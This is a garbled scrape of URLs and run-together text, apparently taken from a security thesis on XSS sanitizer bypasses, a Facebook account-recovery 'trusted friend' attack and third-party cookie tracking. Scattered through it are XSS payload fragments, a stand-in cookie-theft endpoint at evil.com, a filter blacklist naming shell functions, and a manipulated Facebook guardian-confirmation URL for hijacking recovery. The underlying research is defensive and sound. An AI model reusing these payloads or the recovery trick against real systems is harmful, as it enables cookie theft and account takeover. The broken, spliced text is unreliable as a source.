http://goo.gl/mMTj5m61https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules64

http://noscript.net

http://www.thespanner.co.uk/2015/01/07/bypassing-the-ie-xss-filter/63http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=utf-7%3E%2BADw-script%2BAD4-alert

https://github.com/mattpass/ICEcoder/blob/master/lib/settings-common.php#L982https://github.com/symphonycms/xssfilter67

http://051containsanHTMLelementthattriggersaGETorPOSTrequesttothetargetwebapplicationvictim.com

http://xssplayground.net23.net/xss%22onmouseover=%22alert

http://www.w3.org/TR/html-markup/syntax.html#syntax-charref4http://latte.nette.org/71

http://www.thespanner.co.uk/2014/10/24/unbreakable-filter/6https://twitter.com/garethheyes7TheES6basedbypassforanscriptcontextisreportedby@

http://w3techs.com/technologies/overview/programming_language/all9http://www.php.net/usage.php10http://w3techs.com/blog/entry/web_technologies_of_the_year_201375

http://trends.builtwith.com/framework/CodeIgniter76

http://jsfiddle.net/kzauvqkb/*/

http://wiki.ecmascript.org/doku.php?id=harmony:specification_drafts80

http://xssplaygroundforfunandlearn.netai.net/reviewer.html*/MitigationofanXSSattacks.Theinputmustnotcontainanyoneofthecharacters',

https://leanpub.com/understandinges6/read#leanpub-auto-template-strings81

http://xssplaygroundforfunandlearn.netai.net/php-test-beds.html.IncaseofhtmLawed,HTMLPuri

http://pastebin.com/u6FY1xDA.ThelistcontainsXSSattackvectorscontributedbytheauthorsandothersecurityresearchers.ItshouldbenotedthattheattackmethodologyrelatedtoHTMLcontextcannotbesystemizedlikeintheother4contextsbecauseofthefollowingfactors:

https://translate.twitter.com

http://dev.w3.org/html5/html-author/charref18http://jsfiddle.net/Qv6F4/19http://jsfiddle.net/Qv6F4/1/85

http://www.json.org/87

http://sla.ckers.org/forum/read.php?2,15812,page=1089

https://mega.co.nz/#!SUIESATa!zb5Oq5HYNI-wMljJNE-AOTChFTnEgaheah4EO6Bgudc23http://www.php.net/trim24http://www.php.net/strip_tags25http://php.net/htmlentities26http://www.php.net/stripslashes27http://de3.php.net/addslashes28https://mega.co.nz/#!SUIESATa!zb5Oq5HYNI-wMljJNE-AOTChFTnEgaheah4EO6Bgudc90

https://gist.github.com/mbijon/1098477andwefounditsfootprintonmorethan300PHP

https://github.com/cakephp/cakephp/blob/master/lib/Cake/Utility/Sanitize.php#L139.Wefounditsfootprintonmorethan7KPHP

https://github.com/thepipster/athenasites.com/blob/51950d20e7174332890d3828eb393d4b39918d6a/admin/themes/Pandora/page_templates/index.php#L1330https://github.com/Fyr/epma/blob/fcf7da41202ac89add997963cfdfc5493bb3ecc8/app/plugins/articles/views/helpers/html_article.php#L1031https://github.com/search?q=extension%3Aphp+stripImages&type=Code&ref=searchresults32http://api.cakephp.org/2.4/class-Sanitize.html93

https://github.com/EllisLab/CodeIgniter/blob/develop/system/core/Security.php#L321Thisfunctionisbasedonablack-listapproach.ThemainfeatureofxsscleanistosanitizenaughtyHTMLandscriptingelements.Internallythexsscleanfunctionhastwoarraysofblack-listedwordsi.e.,onedealswithpotentiallydangerousHTMLelementsandonedealswithpotentiallydangerousscriptingelements.TheCodeIgniterconsidersthatthefollowingaredangerousHTMLelementsandiffoundintheinput,convertsthemintorespectiveentities./*ListofnaughtyHTMLelements*/alert|applet|audio|basefont|base|behavior|bgsound|blink|body|embed|expression|form|frameset|frame|head|html|ilayer|iframe|input|isindex|layer|link|meta|object|plaintext|style|script|textarea|title|video|xml|xssCodeIgniteralsoconsidersthatthefollowingaredangerousscriptingelementsandiffoundintheinput,convertstheparenthesistoentitiesinordertomakethemnon-renderable./*Listofnaughtyscriptingelements*/alert|cmd|passthru|eval|exec|expression|system|fopen|fsockopen|file|file_get_contents|readfile|unlinkCodeIgniteralsoremovespotentiallydangerousattributeslikestyle,formaction,xmlnsandalleventhandlerslikeonmouseover,onmousemoveetc.$evil_attributes=array

https://mega.co.nz/#!SUIESATa!zb5Oq5HYNI-wMljJNE-AOTChFTnEgaheah4EO6Bgudc94

http://xssplaygroundforfunandlearn.netai.net/clean11.html.ThedevelopersofCodeIgniterhaveexplicitlymentionedthatwebapplica-tionsshoulduseCodeIgniteronvalidatingdatauponsubmissione.g.,logged-in/registrationforms.Bykeepinginmind,CodeIgniter'sfunctionality36,wewillshowXSSbypassesonlyinthestandardHTMLcontextthoughitisalsobypassableintheothercontexts.Abughasbeen

https://github.com/EllisLab/CodeIgniter/issues/2667.Thenewtest-bedforthelatestCodeIgniter'sdevelopementversion

http://xssplaygroundforfunandlearn.netai.net/clean100.htmlandinthistest-bedallourreportedXSSbypasseshavebeen

http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html35https://nealpoole.com/blog/2013/07/codeigniter-21-xss-clean-filter-bypass/36https://github.com/EllisLab/CodeIgniter/issues/2667#issuecomment-3380117595

http://pastie.org/private/nkryfy49l1oy8hvblh90q.In

https://github.com/nette/nette.Fortesting,wehaveusedthelatestversionofNettewhichisavailableathttps://github.com/nette/nette.ThedevelopersofNettehaveprovidedthetest-bedwhichisavailablehere:http://hoola.cz/nette-xss-test/.WefoundnobypassinstandardHTML,styleandscriptcontextbecauseofproperlyescapingdangerouscharactersintorespectiveentitiesbutwereabletobypassNetteinanattribute

http://www.root.cz/clanky/velky-test-php-frameworku-zend-nette-php-a-ror/39https://github.com/nette/nette/issues/130140https://github.com/nette/nette/issues/149696

http://vnd.ms.radio

http://xssplaygroundforfunandlearn.netai.net/clean12.html.WewereabletobypassHTMLSafewiththehelpoffollowingXSSattackvectors.i

https://github.com/pear/HTMLSafe/blob/trunk/HTML/Safe.php42https://mega.co.nz/#!SUIESATa!zb5Oq5HYNI-wMljJNE-AOTChFTnEgaheah4EO6Bgudc97

http://www.scribd.com/doc/211362856/Stored-XSS-in-Twitter-Translation44http://www.scribd.com/doc/210121412/XSS-is-not-going-anywhere98

http://www.google.com/?gws_rd=ssl#q=xss+attack+vector+%2B+%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm

http://pastebin.com/u6FY1xDAandfoundnobypass.TheonlinedemoofourXSSsanitizerisavailableherehttp://xssplaygroundforfunandlearn.netai.net/final.html.101

http://demo.chm-software.com/7fc785c6bd26b49d7a7698a7518a73ed/46https://bugcrowd.com/47https://twitter.com/filedescriptor48http://www.w3.org/TR/html-markup/syntax.html#syntax-attr-single-quoted49http://es5.github.io/x7.html#x7.8.450https://groups.google.com/forum/#!topic/icecoder/iogfVpbB3nc102

https://bugcrowd.com/icecoder52http://www.getsymphony.com/explore/showcase/53https://www.wolfcms.org/repository54http://trends.builtwith.com/cms/Wolf-CMS55https://www.assembla.com/wiki/show/confusa56https://github.com/henrikau/confusa/commit/379d93e81d21b2e2c73c542050ecd1231c00507b57http://goo.gl/2iZB7f103

http://packetstormsecurity.com/files/123927/owaspjava-bypassxss.txt59http://owasp-java-encoder.googlecode.com/svn/tags/1.1/core/apidocs/org/owasp/encoder/Encode.html104

http://trends.builtwith.com/docinfo/Content-Security-Policy105

https://www.blackhat.com/docs/eu-14/materials/eu-14-Javed-Revisiting-XSS-Sanitization-wp.pdf107

http://jejacks0n.github.com/mercury

https://github.com/jhollingworth/bootstrap-wysihtml5

http://kindeditor.org

http://phphtmleditor.com/demo/

http://elrte.org

https://github.com/daviferreira/medium-editor

http://www.tinymce.com

http://www.lithium.com

http://www.jivesoftware.com

http://editor.froala.com

http://ckeditor.com

http://ephox.com/editlive

https://github.com/huacnlee/jquery.qeditor

https://github.com/bordeux/HTML-5-WYSIWYG-Editor

http://markitup.jaysalvat.com/home/

http://www.freetextbox.com

http://014reball.net/projects/markdown/

http://premiumsoftware.net/CLEditor/SimpleDemo

https://github.com/rcode5/image-wysiwyg-sample

http://jhtmlarea.codeplex.com

http://aloha-editor.org

http://nicedit.com

https://www.raptor-editor.com

https://www.webwiz.co.uk/web-wiz-rich-text-editor/

http://WYSIWYGeditorsmayusecontentEditableordocument.design

https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement.contentEditable111

http://017document.design

http://document.design

https://developer.mozilla.org/en-US/docs/Web/API/document.designMode4http://html5demos.com/contenteditable112

http://werefertotheworkbyHeiderichetal.in

http://werefertotherecentworkbyHeiderichetal.in

http://i.imgur.com/ESkQG9O.jpg.TheCSPexplicitlytellsthebrowserabouttrustedresourcesforimages,script,media,andstylesetc.TwitterTranslation6isoneoftheTwitter'sservicewherecommunitycanhelpintranslatingTwitterrelatedstu

https://twitter.com

https://twitter.com/6https://translate.twitter.com115

http://www.tinymce.com/develop/bugtrackerview.php?id=6855|6851|68588https://github.com/froala/wysiwyg-editor/issues/33117

http://www.ieee-security.org/images/new-web/TrojanHorse.jpg?

http://cheeaun.github.io/mooeditable/118

http://www.scribd.com/doc/226925089/Stylish-XSS-in-Magento-When-Style-helps-you119

http://sobjectfreezingfeaturefromtheear-lierworkdonebyHeiderichetal.in

http://www.w3.org/TR/CSP/3https://www.owasp.org/index.php/HTML_Injection124

https://bugzilla.mozilla.org/show_bug.cgi?id=763879125

http://htmlpurifier.org/6http://www.slideshare.net/x00mario/the-innerhtml-apocalypse7http://jsfiddle.net/49a6e/8http://htmlpurifier.org/news/9https://www.owasp.org/index.php/Cross-Site_Request_Forgery_

http://sdirectives.SIACHENalsoleveragesobjectfreezingpropertiesfromearlierworkdonebyHeiderichetal.in

https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/base_rules/modsecurity_crs_41_xss_attacks.conf129

http://pastebin.com/hTZRMtwy.Themainpurposeofsurveyisto

http://www.evil.com/cookie.php?c=

http://www.evil.com

http://i.imgur.com/P8mL8.jpg';document.body.appendChild

https://twitter.com/RSnake131

http://policy.bplaced.net/policytest/images/logo.png

http://policy.bplaced.net/policytest/images/logo.png';}InordertoapplyECMAScript'sobjectfreezingprotection,SIACHENexpectsthatdeveloperswillspecifyauniqueidenti

http://www.geo.tv/isusing

http://policy.bplaced.net/policytest/images/spacer.gif

http://policy.bplaced.net/policytest/images/spacer.gif';}SIACHENexpectsthatdeveloperswillspecifythekeyword

http://www.geo.tv/images/spacer.gif133

http://policy.tipido.net/tipido.js

http://policy.tipido.net/tipido.js';}Inthischapter,wehavemodi

http://policy.square7.ch/square7.js

http://policy.square7.ch/square7.js';}Listing6.7:CSP'sscript-nonceprotectiononsiachen.js

http://policy.bplaced.net/example1/style.css

http://policy.bplaced.net/example1/style.css';}

http://policy.bplaced.net/example1/index.php

http://policy.bplaced.net/example1/index.php';form-source-allow-from:'i_validate

http://014edatrun-time.Heiderichetal.in

http://sobjectfreezingfeaturesfromtheearlierworkdonebyHeiderichetal.in

http://1.Object.de

http://i.imgur.com/E99GzM8.jpgshows

https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules16https://www.trustwave.com/modsecurity-rules-support.php17http://noscript.net/changelog18https://addons.mozilla.org/en-US/firefox/addon/noscript/138

http://i.imgur.com/g32We95.jpgshowsthecodeofoutputencodingfunc-tion.Inordertodemonstrate

http://www.example.com/PHPBB?xss=attackvector4.Inthisstep,wedeliverthepolicyvia

http://www.randomstorm.com/142

http://www.example.com/anyarbitarayimage.png

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet2.HTML5SecurityCheatsheetavailableathttp://html5sec.org/3.@XSSVectorTwitterAccounthttps://twitter.com/XSSVector.Ithas140pluslatestXSSvectorsthatworkacrossbrowsers.Noneofthevectorsfromtheseabovementionedresourceswereabletobypassourlayereddefencemechanism.TheFigureavailableathttp://i.imgur.com/e0vJkbf.jpgshowsSIACHENcorrectlycapturestheXSSattackvectoranddisplayswarningmessage:

http://i.imgur.com/jtawLwc.jpgshowsoutputencodingworksaccordingly.Inourearlierpublishedwork[41],wewereabletogatheraround10KXSSattackvectorsasapartofourXSSFilterevasioncommunitychallenge.Inthesecondphaseoftesting,wehavetestedSIACHENagainstlargenumberofXSSvectorsandfoundnobypass.ThissupportsourclaimthatweneedlayeredapproachforthemitigationofXSSattacks.The

http://i.imgur.com/2Cwb976.jpgshowsthedistributionofdi

http://pastebin.com/hTZRMtwy.6.6.1PrevalenceofXSSWefoundXSSinall

http://i.imgur.com/e6458JE.jpgshowsXSSinNokiaMapsi.e.,http://here.com/andTheNewYorkTimes

http://www.nytimes.com

http://xssplaygroundforfunandlearn.netai.net/victim.html.Theonlythingattackerrequiresistotrickvictimtoclickonthelink.Atthetimeofwriting,Geckoengine

http://email.about.com/od/windowslivehotmailtips/qt/Know_When_Your_Windows_Live_Hotmail_Account_Becomes_Inactive.htm151

https://www.facebook.com/notes/facebook-security/introducing-trusted-contacts/101513627749807663ThetermTrustedFriendAttack

https://developers.facebook.com/tools/explorer153

https://developers.facebook.com/tools/explorer?method=GET&path=FBID?fields=id,nameTheattackercaninputanyFacebookusernameasavalueofthepathpa-rameterandreplaytherequest.TheAPIrespondswiththecompletenamealongwiththeuserID.WehaveusedtheLiveHTTPHeadersextension5forreplayingPOSTdata.Inthesamemannertheattackerisabletorepeattheprocessfortheselectionofthesecondandthirdfriendandtheattacker'schosenaccountswillreceivethesecretcodesforrecovery.7.3.3URLManipulationBeforethe

https://www.facebook.com/guardian/confirm.php?guardians0=FBID0&guardians1=FBID1&guardians2=FBID2&cuid=AYi[...]XrNQaw&email=attackersuppliedemailaddressgoeshereHereFBID0,FBID1,FBID2areplaceholdersfortheuserIDs,cuidistheplaceholderforhashvaluethatFacebookcalculatesatrealtime,andattacker-suppliedemailaddressgoeshereisaplaceholderfortheattacker'screatedemailaddress.WhiletheattackercannotpreventFacebookfromsendinganoti

https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/154

https://www.facebook.com/first_name.last_name.50596.Outofthe250accountstested,69accountsallowaccountrecoveryiftheusernolongerhasaccesstotheregisteredemail.

http://privacychoice.org

https://addons.mozilla.org/en-us/firefox/addon/ttpcookie/.TTPCookiestandsforTrustedThird-PartyCookie.2http://www.alexa.com/160

http://i.imgur.com/YDYJl7O.png164

http://www.chm-software.com/ttpCookie/?p=overview5http://fourthparty.info/167

http://Requests1.doubleclick.net

http://682.facebook.com

http://443.google.com

http://864.scorecardresearch.com

http://595.twitter.com

http://646.quantserve.com

http://887.imrworldwide.com

http://578.adnxs.com

http://069.yieldmanager.com

http://9710.2o7.net

http://5011.yadro.ru

http://6512.baidu.com

http://0713.revsci.net

http://7114.serving-sys.com

http://6315.addthis.com